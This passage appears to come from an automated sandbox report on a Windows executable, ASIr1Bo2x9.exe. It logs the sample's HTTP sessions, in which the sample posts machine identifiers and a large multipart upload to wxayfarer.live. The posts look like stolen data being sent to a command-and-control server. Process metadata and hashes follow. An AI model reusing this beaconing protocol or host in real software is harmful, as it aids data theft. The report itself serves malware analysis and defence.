                                                2025-03-25 13:59:24 UTC5080OUTData Raw: 3b 4f 56 53 12 62 f5 46 5d 1e 05 2c 5e 87 86 4d 35 b9 3d 8e 8d 86 72 15 16 28 1f c0 85 4c 68 6f f1 cc 3f eb b9 3a 11 34 64 3a aa d7 66 20 fe 86 07 bb 93 6e a7 00 78 f4 91 d4 e8 5e 27 91 17 bd 18 10 42 05 ad 51 8b c2 c1 72 2c b9 d1 e6 b6 10 86 1d d2 cc 52 03 e7 f3 de 33 1e ff 76 79 70 54 8d b3 e2 bc a3 cc 2b f6 b6 95 5a 7a e6 84 b8 2d 57 f4 e6 d2 a7 3d f6 ce e4 2a 38 31 ab e7 55 0c be 1f 4f 89 ad fb a0 7d 91 17 1b 1c c5 5c ba 72 89 7a 1c 13 9e 1c 6f 37 95 7b 39 51 b7 47 a6 4b 29 c6 04 9e e9 82 b8 3c 34 ad 9a 6f 50 6f 7f 6c 11 e6 b2 70 b7 3e c1 78 7f 00 db ee 28 1c 39 24 a3 09 36 17 2f 48 b7 93 61 88 cb 78 f3 b6 85 8e 6d 27 ce 69 3f 27 f4 52 67 76 ff e4 cb c1 21 75 45 64 0c 9e 43 af 08 59 dc 53 f0 f8 44 da fc d6 cd 1f 24 de e6 7d 71 94 cf e7 8e 94 f3 1b 98
                                                Data Ascii: ;OVSbF],^M5=r(Lho?:4d:f nx^'BQr,R3vypT+Zz-W=*81UO}\rzo7{9QGK)<4oPolp>x(9$6/Haxm'i?'Rgv!uEdCYSD$}q
                                                2025-03-25 13:59:25 UTC808INHTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:25 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LOOaRkOHYtqRX0tunTwq5AfXF004dw9H7VaZGeqgaOQ1b97latgeiT8aU8ResyDrrWgT9dktle61sxj2zvyU%2BZrOPcLyyFyOjxP3pWS2bxbHwMqRl2z55PnMgCpC3SV0lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eedbaf8d142a1-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=106342&min_rtt=103842&rtt_var=24259&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21370&delivery_rate=35731&cwnd=244&unsent_bytes=0&cid=64abfc9d2c4e47fd&ts=606&x=0"
                                                2025-03-25 13:59:25 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d 7d 0d 0a
                                                Data Ascii: 44{"success":{"message":"message success delivery from 161.77.13.20"}}
                                                2025-03-25 13:59:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.449727104.21.80.14437588C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                TimestampBytes transferredDirectionData
                                                2025-03-25 13:59:27 UTC276OUTPOST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=vAU7SSh5bM0f
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 2322
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:27 UTC2322OUTData Raw: 2d 2d 76 41 55 37 53 53 68 35 62 4d 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 34 30 63 30 34 63 65 65 37 63 39 38 36 30 39 64 35 64 33 30 63 66 30 30 62 38 65 64 35 66 34 35 31 62 66 62 64 64 36 32 34 37 0d 0a 2d 2d 76 41 55 37 53 53 68 35 62 4d 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 76 41 55 37 53 53 68 35 62 4d 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 44 33 35 30 45 39 34 41 33 39 44 46 42 37 33 38 30 31 35
                                                Data Ascii: --vAU7SSh5bM0fContent-Disposition: form-data; name="uid"40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247--vAU7SSh5bM0fContent-Disposition: form-data; name="pid"1--vAU7SSh5bM0fContent-Disposition: form-data; name="hwid"CAD350E94A39DFB738015
                                                2025-03-25 13:59:27 UTC808INHTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:27 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ITgd1fZJamcescMZ3lKMZ77V59fnBvOadPQactMxMWutONjHWzNqqtKXVfLUoYTCSM05hMBxb%2BQ4m1cnv1ao3e1dnMvhwzpBH4adSlgwyv0sgd2L5M0j%2BpaMFUS31ziLAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eedcaa9c27283-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=101017&min_rtt=100134&rtt_var=22453&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2832&recv_bytes=3234&delivery_rate=36233&cwnd=217&unsent_bytes=0&cid=cc04f1e0fb7c121b&ts=550&x=0"
                                                2025-03-25 13:59:27 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d 7d 0d 0a
                                                Data Ascii: 44{"success":{"message":"message success delivery from 161.77.13.20"}}
                                                2025-03-25 13:59:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.449728104.21.80.14437588C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                TimestampBytes transferredDirectionData
                                                2025-03-25 13:59:28 UTC282OUTPOST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=Or6Sl54ft9x4ECG6
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 585900
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:28 UTC15331OUTData Raw: 2d 2d 4f 72 36 53 6c 35 34 66 74 39 78 34 45 43 47 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 34 30 63 30 34 63 65 65 37 63 39 38 36 30 39 64 35 64 33 30 63 66 30 30 62 38 65 64 35 66 34 35 31 62 66 62 64 64 36 32 34 37 0d 0a 2d 2d 4f 72 36 53 6c 35 34 66 74 39 78 34 45 43 47 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 72 36 53 6c 35 34 66 74 39 78 34 45 43 47 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 44 33 35 30 45 39 34
                                                Data Ascii: --Or6Sl54ft9x4ECG6Content-Disposition: form-data; name="uid"40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247--Or6Sl54ft9x4ECG6Content-Disposition: form-data; name="pid"1--Or6Sl54ft9x4ECG6Content-Disposition: form-data; name="hwid"CAD350E94
                                                2025-03-25 13:59:28 UTC15331OUTData Raw: cd 1f 9f bc 3e c4 1a b4 ce 6e c5 11 e8 99 1d 4f 8e 69 bd 7f c5 2c 86 38 8f a6 03 d5 96 d6 22 c8 00 fe dc 70 1d f7 e6 a3 1c 33 bf f8 74 5d b1 a7 ff 5d 96 42 8b 92 4e 0d 30 bc df 2c 0a 0d 9a 1e 93 77 dc 3d d8 8f f2 48 ae 8e ca e4 fa a3 4b 36 af eb a6 91 d1 66 d0 a0 bd a6 a7 77 41 3a b4 3b 40 a7 34 69 20 cc 0c e2 25 00 df 9e b6 70 0b d5 aa 99 df 38 76 1b 27 3f be 37 31 21 83 e2 22 57 36 0b ea 34 2a 12 f0 e8 54 8d d2 78 76 29 ac a0 2d df 59 bc e5 e8 4e fa 2c 49 56 b2 d1 e1 e1 a7 6d 53 d6 1c 5c 4e 3c 48 23 44 5a 48 44 93 42 d1 54 6b 62 5d 0a 82 d6 ae 4a ec 43 ca 37 25 92 6e c8 a2 45 59 68 d2 80 fd a7 70 08 f1 4a 76 a7 d9 dd b3 c0 13 85 f4 a4 9f 52 7a 9e 66 46 1a bf a7 2c b9 cd 4c 8e ed 08 d2 9c d4 50 a3 f8 08 69 e6 a3 20 4f 31 c1 9f 0f 8a 19 4e 3c 42 77 80 ca
                                                Data Ascii: >nOi,8"p3t]]BN0,w=HK6fwA:;@4i %p8v'?71!"W64*Txv)-YN,IVmS\N<H#DZHDBTkb]JC7%nEYhpJvRzfF,LPi O1N<Bw
                                                2025-03-25 13:59:28 UTC15331OUTData Raw: c9 1b 58 69 74 5d 4d de 76 d0 98 97 57 dc 4c 93 1e a0 f1 0f 39 aa 35 e8 3b 34 64 f6 d7 75 55 ec 43 dd f2 b8 b3 6b 27 05 d7 18 2e 26 90 58 2e f5 31 03 2d 31 d2 37 3b 4f 19 52 77 ca e2 4e d6 75 27 0b 5f 1d f0 86 57 0c 15 79 d0 c1 78 d5 c2 08 02 58 d5 cf 53 f7 a6 4a 18 c4 31 5c 3a b0 bb 75 46 86 2e 70 12 d9 4d a3 a3 a4 15 ad 94 8e a5 b3 84 1c 41 03 68 6f f6 f6 f4 84 f5 d9 14 c8 ba 28 a5 0b 73 ed bd 14 0b 0c 51 f8 be 92 ad 29 98 8c b1 f3 48 fa e7 6c 0b a0 bf ca fc 82 83 b7 3d b4 47 ef 4f e2 26 24 c8 5f 11 eb dc 39 8f 91 41 d4 d7 c6 8c 8c ca 81 b9 3c 16 7d 42 3e b9 29 ca ad 02 b1 de 49 95 23 66 73 7b 0b b3 ef 18 64 e3 3d 25 67 b0 5b 73 7b fb ae 43 33 37 5b 9e 02 53 0b bb 4a ca 21 b4 ee ee 72 c8 85 a1 f2 96 f3 09 02 9b 4a 50 60 cf 92 3b 44 d1 3c c8 4a 03 07 93
                                                Data Ascii: Xit]MvWL95;4duUCk'.&X.1-17;ORwNu'_WyxXSJ1\:uF.pMAho(sQ)Hl=GO&$_9A<}B>)I#fs{d=%g[s{C37[SJ!rJP`;D<J
                                                2025-03-25 13:59:28 UTC15331OUTData Raw: 25 aa 8d 50 1f 6c d8 1b 5e a8 3e 3b 11 2f 5d bd c9 2d 0a c1 98 5f bd a0 8d a1 31 34 4e 67 39 af a4 c3 21 6c ad 58 05 2f e2 ad de e5 0d c1 23 f6 99 24 e9 bb 1f 7f 5a 89 93 4b fb 3c 83 87 3d a8 4f 7a e0 31 eb ed 72 1a b2 68 b3 6e 0c b5 d8 99 ad af 57 31 29 a4 91 90 2b d4 9d 28 a5 d5 23 4b 0d 5f d9 34 ac 49 02 5d 2b 83 fe 2e 80 b2 50 d1 6a da 65 9c 57 27 55 98 29 88 48 10 9c 03 8e 82 12 43 0d 15 ef 0b f3 90 0c 11 ba 8a 21 61 e0 16 59 b6 f1 27 e9 41 a5 4d a2 bc 0b 5d b2 f6 07 bb 9f 71 9a 78 2d e1 29 28 68 1a ac 3c 41 c9 de 4b 9c a9 30 98 eb 39 80 fa 08 57 d6 18 b4 ec 54 0f 42 b2 ef 7e 9a 81 74 95 b3 1c ec a7 c2 4f 7c 0e ed 81 a0 cb fd 94 53 67 f5 eb ea 69 48 33 63 ba b0 63 ee 09 f3 9e e2 6b 54 33 2f 73 ac 06 ea 46 02 55 78 41 e1 0f a4 bb c5 92 41 1c 2a 6a f8
                                                Data Ascii: %Pl^>;/]-_14Ng9!lX/#$ZK<=Oz1rhnW1)+(#K_4I]+.PjeW'U)HC!aY'AM]qx-)(h<AK09WTB~tO|SgiH3cckT3/sFUxAA*j
                                                2025-03-25 13:59:28 UTC15331OUTData Raw: e9 2f 05 d0 99 38 71 ad d5 be dd 50 19 77 86 58 28 6d b8 fd f8 c1 18 7f b3 94 1e 0c 93 9f 2a d8 92 20 85 4f 18 f8 59 a9 de 6c 6a f5 79 11 66 a2 ef b1 68 87 17 b0 f9 00 70 4a 9e aa b8 68 1d 1c 27 85 3d 59 7a 77 02 5c 86 bc 0d c6 dc 58 04 1c ab 55 3f d9 23 58 e1 95 bf ae b1 1c 42 8d ef c9 1f eb 0a 23 44 ad 7c 0e b6 9a 7a 34 de bd 01 35 7c 74 2b 44 31 2c 09 63 37 11 49 a7 d0 05 11 46 53 28 81 ec cd df c3 55 af 23 ed f2 bb 9f 47 39 dd 31 3b 74 9d c9 c2 50 4f 51 b5 ad 94 0c 2f dc 28 be f6 b1 3b 05 90 08 5d 4c e1 e0 09 27 15 9d 4d 48 37 99 a1 53 f2 82 cb 23 ba d6 af 1a c3 5c 76 4f c2 74 f3 2b 99 44 1a e1 72 a0 d7 da ab df cf db 05 98 40 8a 08 2c 06 00 bb 17 05 49 75 e4 50 37 77 0b d8 4b d4 bd c5 9d c2 b8 05 65 dc 5e cf 2e 31 d1 de c2 dd 9d 94 30 19 d3 be 8f aa
                                                Data Ascii: /8qPwX(m* OYljyfhpJh'=Yzw\XU?#XB#D|z45|t+D1,c7IFS(U#G91;tPOQ/(;]L'MH7S#\vOt+Dr@,IuP7wKe^.10
                                                2025-03-25 13:59:28 UTC15331OUTData Raw: 3e 93 a0 2f 7a 90 03 6f 01 20 70 05 97 e9 c0 ab 14 d9 3e 92 72 19 e7 ab ee 5f 1e 10 79 a5 51 20 60 c0 d2 b3 4b ec 84 2d ac a6 45 1a 7d e6 5f 26 bc ed 76 b8 72 66 34 5e 06 49 b7 a0 80 14 cc d9 e7 29 c0 ba 85 68 5a 97 f9 c1 0a 25 c1 e2 d6 ec fa 1e e7 7d e0 9d d5 c9 c5 2b ae 5c 0a fe 03 4d 32 d8 40 1e ad ab 07 1c c1 db fa 8a 50 e7 14 bf 15 21 dd e1 8f 6d be 94 74 7a 57 86 a0 00 3f 7c c8 ee 95 73 29 ef cc 85 5d 6e 72 3e 58 3a 0e 0d cc e0 77 b1 68 a5 f0 d2 27 79 a8 85 95 34 ce 2a 5f 5a a8 4c 7d fe 26 f4 ed ed 77 59 30 fb a5 f4 93 71 94 cc fd 2b 93 55 12 9a 22 a8 b8 fe 32 de 08 29 bf 58 61 a2 32 d0 4b 65 12 e5 8b bb 29 f3 5d 71 6e f2 cc 18 85 61 d7 1d d3 b5 f3 4c 8d 5e 86 d3 c3 4c 7f 37 81 0c 7b b9 6b b2 a5 1d 27 71 89 b7 8e 6c 71 17 7e 4c 2d 40 80 a7 95 44 03
                                                Data Ascii: >/zo p>r_yQ `K-E}_&vrf4^I)hZ%}+\M2@P!mtzW?|s)]nr>X:wh'y4*_ZL}&wY0q+U"2)Xa2Ke)]qnaL^L7{k'qlq~L-@D
                                                2025-03-25 13:59:28 UTC15331OUTData Raw: 7d 5d e1 60 19 15 c8 a5 ad 65 12 cf 27 02 5d 75 35 e9 5d cd 17 08 23 87 6b 7d 73 3d 01 6c 43 25 b4 d4 36 56 0d f4 b8 d8 d9 b2 eb da b8 f0 f0 d8 71 60 5c 20 dc c1 df 55 4e 15 68 4d f7 c5 43 26 b2 76 26 58 d0 71 1e cd 1e 99 58 68 d6 81 f2 84 6b 45 64 4f b4 14 ee 08 8d b8 b7 e4 58 70 6b fa 37 4a 07 7b e8 05 1b 91 5b 89 0c 93 0d a4 f9 2d b5 56 99 f0 3e 7d b5 85 c3 99 6a b2 5c 62 a1 bf 56 e7 ba d0 c4 55 d5 b3 19 04 68 65 c3 f4 c7 54 ff 7a ee ae 90 8f 23 e2 3c 6f 79 f0 e7 fc 48 2f 14 c1 e4 1d e3 2f 5d 04 83 c2 6d 71 e1 cf f6 ce 92 88 c7 3b 3f f8 47 b6 a9 44 c1 11 ce ea 77 f2 d9 b5 2f 87 a6 55 d5 a5 62 6d 1c 51 74 70 fe 62 81 76 7a ed 94 10 20 c8 16 e5 a5 3b 17 ba 64 92 cc 36 00 67 bc 7b 50 77 b0 68 7a 37 26 e8 1b 2e 94 31 c1 84 47 13 8d f0 93 f1 da 9b 75 eb 55
                                                Data Ascii: }]`e']u5]#k}s=lC%6Vq`\ UNhMC&v&XqXhkEdOXpk7J{[-V>}j\bVUheTz#<oyH//]mq;?GDw/UbmQtpbvz ;d6g{Pwhz7&.1GuU
                                                2025-03-25 13:59:28 UTC15331OUTData Raw: 16 22 a0 0a 00 ad ba eb 5f c2 00 5f 66 4a 47 46 55 18 82 fe 3c 52 44 04 67 28 43 81 26 9a f5 ad 98 69 95 02 6f 26 22 48 ff ee a5 7f 17 46 03 b0 bf 85 4a 15 9f 03 da 3a d1 11 1c 72 b2 39 fa 04 20 1f 10 06 c3 b9 61 a0 b9 eb 12 2c 3c 9e 2e 69 bd 9c fa 6a e0 e9 b8 ab b7 70 be ec 82 e6 84 dc 5f 14 e0 e3 8b 61 26 2b 27 a9 f9 12 fd 71 c9 c4 f2 39 3a cc f5 3a e7 82 72 a9 35 fa d6 7e 7f 61 47 54 a9 98 4e 10 5f ea b8 64 d8 3f cc e9 7f e0 ab 60 9f 4d 2e c3 a2 b4 65 51 a5 4c a5 0f d1 77 13 c5 3a 44 ee 0f d4 80 ba d8 34 87 f5 cb 43 c2 d7 4e 97 07 af 52 34 e0 cf 92 4a b4 b4 17 79 9d c4 30 1a 4c 5b 0f 41 72 42 06 ac 35 e6 0d 91 7f fa 8d 06 b2 a7 66 e5 3c 76 93 6c e9 b8 fb 06 09 56 69 6f b1 a4 b0 b1 ab 06 c7 9d 78 d6 56 96 7b 36 14 77 b2 a3 09 30 dc 37 32 37 4e 62 a0 32
                                                Data Ascii: "__fJGFU<RDg(C&io&"HFJ:r9 a,<.ijp_a&+'q9::r5~aGTN_d?`M.eQLw:D4CNR4Jy0L[ArB5f<vlVioxV{6w0727Nb2
                                                2025-03-25 13:59:28 UTC15331OUTData Raw: d5 61 1b 5e ae 7c 11 55 97 35 76 3c fb 66 5c 0c aa 4e 62 2c ed 83 03 e0 96 9d 26 be c6 b6 8c b1 86 f2 90 3b e7 1d 74 f0 bd 3e be d8 8e f9 10 6f fc 8e b7 23 c0 33 13 67 b6 06 69 4d 25 d8 2d 7b 0e c1 93 8c cb 7e be 65 20 de 4c 64 74 0e c8 9b 2d 0d ac a1 84 64 20 de df 4e 05 ee dd 4b dd 28 53 3c f3 73 69 1e 19 c7 2a c9 ce 97 06 ba 81 58 82 a8 2e c3 a6 a7 54 a0 d4 7d 83 28 82 a3 06 56 ff 1b 89 1c 00 00 e3 4a 5c 88 5a fa 45 cc b7 a8 4b c8 ba 20 1e 2b d6 bf 32 64 d2 05 bc 4a 36 1a b7 16 f5 39 9b 56 34 b9 26 30 2a 79 d3 03 7f 3c 11 80 1c bf 9f 96 4c 46 45 34 8f c1 02 a8 2f 32 ab a2 be 8e c6 4e 38 dd d9 b9 4d 63 9a be de 0e be 4e 45 37 f4 f2 58 9c 1e 6a 0f 4e 83 d4 32 2a 1c 0f 67 c5 5d ad af 41 64 90 aa 90 32 36 53 eb dc 4e 75 37 6d 39 3a 0d e3 e5 80 78 71 ba 59
                                                Data Ascii: a^|U5v<f\Nb,&;t>o#3giM%-{~e Ldt-d NK(S<si*X.T}(VJ\ZEK +2dJ69V4&0*y<LFE4/2N8McNE7XjN2*g]Ad26SNu7m9:xqY
                                                2025-03-25 13:59:28 UTC15331OUTData Raw: 2f ed 65 b8 04 59 b5 da eb 9f 2c 38 18 f5 5a f9 1c 42 bf 11 c8 b5 f3 80 aa 1c bf 7b 30 c9 68 20 4a f3 f3 0b 6f b1 ec 30 4f d1 2d 91 24 5b 43 b8 d2 c1 f0 dd 2e 49 4c 6d 65 da bd fc 49 fb 56 7c b7 a7 a0 47 d1 ab 80 69 51 69 32 d2 5f 8c cb ad fe a8 c6 53 1a 24 31 18 41 56 56 c2 3d 8b c4 db 93 1f b5 56 00 e8 f0 d0 75 b4 eb d9 d2 db c1 77 25 6b 10 39 e1 1c e4 aa 4e 0b 9c 9c 70 02 50 51 6c 34 d3 db 60 dd 5d 44 17 f5 27 24 df 29 b8 4d 12 7a 57 60 7d 6c 21 1c f2 19 b8 19 94 af 4a ae 9a e4 da b6 2f 62 ff 4e f8 f4 aa 7b 84 bf c2 78 c0 0e 27 82 42 17 7f 83 35 e7 94 53 e2 0d c1 00 1c 53 fd 56 25 e1 14 06 a0 59 1b 1b 3e bb 51 05 93 7c 29 93 b5 3c bd 65 ab 21 e1 b3 81 8a bf a4 35 ec 9d 2c fe d9 9b 05 25 56 a1 db 70 65 cc c9 77 b4 16 0f e9 dc e8 ef f3 fc 98 ab 03 6e 50
                                                Data Ascii: /eY,8ZB{0h Jo0O-$[C.ILmeIV|GiQi2_S$1AVV=Vuw%k9NpPQl4`]D'$)MzW`}l!J/bN{x'B5SSV%Y>Q|)<e!5,%VpewnP
                                                2025-03-25 13:59:29 UTC818INHTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:29 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLZ5bWaqh5YqHLCMVZmXk%2FvydpDUWTyDPPRHHtsXhgshjZbCBE940nNXbqgacUooYqqc6pCLmDiwUrPFT1B5UCrXQ3NZlzW0L%2Bk%2BvJt%2FqiiBSROwNdJBieDYo98pJiBjRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eedd2eb8e6e53-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=104482&min_rtt=101147&rtt_var=24411&sent=442&recv=482&lost=0&retrans=0&sent_bytes=2832&recv_bytes=588490&delivery_rate=36576&cwnd=226&unsent_bytes=0&cid=26f48d00c18a3355&ts=1573&x=0"


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.449729104.21.80.14437588C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                TimestampBytes transferredDirectionData
                                                2025-03-25 13:59:30 UTC265OUTPOST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 89
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:30 UTC89OUTData Raw: 75 69 64 3d 34 30 63 30 34 63 65 65 37 63 39 38 36 30 39 64 35 64 33 30 63 66 30 30 62 38 65 64 35 66 34 35 31 62 66 62 64 64 36 32 34 37 26 63 69 64 3d 26 68 77 69 64 3d 43 41 44 33 35 30 45 39 34 41 33 39 44 46 42 37 33 38 30 31 35 45 33 30 45 35 45 34 35 38 39 39
                                                Data Ascii: uid=40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247&cid=&hwid=CAD350E94A39DFB738015E30E5E45899
                                                2025-03-25 13:59:30 UTC788INHTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:30 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 104
                                                Connection: close
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GXaP12UzwZnNgXHWt1O1FqJveYgTGxupcEIgt2ABKoY%2Fgl7nXVuStTC0j%2F7bmf1M9PY2FlaYAXKHwz%2F7ypIVAoJIYAwbn62u9M%2FFWmoRb1KIntgRX1P18tBdnzpZ57V9uQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eeddf49a44310-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=106543&min_rtt=104369&rtt_var=24242&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=990&delivery_rate=35664&cwnd=251&unsent_bytes=0&cid=72d352efcf435679&ts=655&x=0"
                                                2025-03-25 13:59:30 UTC104INData Raw: 3c 5c 7e 33 32 87 b0 73 68 e9 f8 07 f6 fa e7 69 59 0a fc 6b 9d 8d 43 42 ea d2 16 09 a4 dc de d2 e4 d4 62 8d 6e 76 32 61 71 f5 29 05 dd 00 67 a5 75 6b d9 f8 e7 b9 a3 23 84 2f 33 92 f4 4f bc 8b 24 b4 df 7b f8 5e 46 b9 94 4a 87 cb f0 fb fd 2c 07 95 d1 3d e6 03 5c 3c 25 9a fd 42 19 eb e3 27 c4 db 0c 79 d3 5d 31 8e
                                                Data Ascii: <\~32shiYkCBbnv2aq)guk#/3O${^FJ,=\<%B'y]1


                                                Statistics

                                                CPU Usage

                                                050100s020406080100

                                                Click to jump to process

                                                Memory Usage

                                                050100s0.001020MB

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                • File
                                                • Registry

                                                Click to dive into process behavior distribution

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:09:59:14
                                                Start date:25/03/2025
                                                Path:C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\ASIr1Bo2x9.exe"
                                                Imagebase:0xeb0000
                                                File size:2'990'592 bytes
                                                MD5 hash:F9915DE2E2CA00D8D19A8D021B433926
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true
                                                Show Windows behavior

                                                File Activities

                                                Show Windows behavior

                                                Section Activities

                                                Show Windows behavior

                                                Registry Activities

                                                Show Windows behavior

                                                COM Activities

                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                Show Windows behavior

                                                Process Activities

                                                Show Windows behavior

                                                Thread Activities

                                                Show Windows behavior

                                                Memory Activities

                                                Show Windows behavior

                                                System Activities

                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                Show Windows behavior

                                                Windows UI Activities

                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                Disassembly

                                                Non-executed Functions

                                                Memory Dump Source
                                                • Source File: 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D8B000, based on PE: false
                                                • Associated: 00000000.00000003.1384966149.0000000000D8D000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_d8b000_ASIr1Bo2x9.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b515647b09e41a4b79c165ba4519df77647a1f7aee0da2cbfee5f44ebed79f3
                                                • Instruction ID: 4f92b00f23a561b0979fc81cfc33e2ad55a6e34262584635c1553f650a7f3c62
                                                • Opcode Fuzzy Hash: 2b515647b09e41a4b79c165ba4519df77647a1f7aee0da2cbfee5f44ebed79f3
                                                • Instruction Fuzzy Hash: 86D1EF6140E3C18FD7535B744EA91847FB0AE2722072E45DBC4C0CF5B3E298495ADB6A
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_d8b000_ASIr1Bo2x9.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
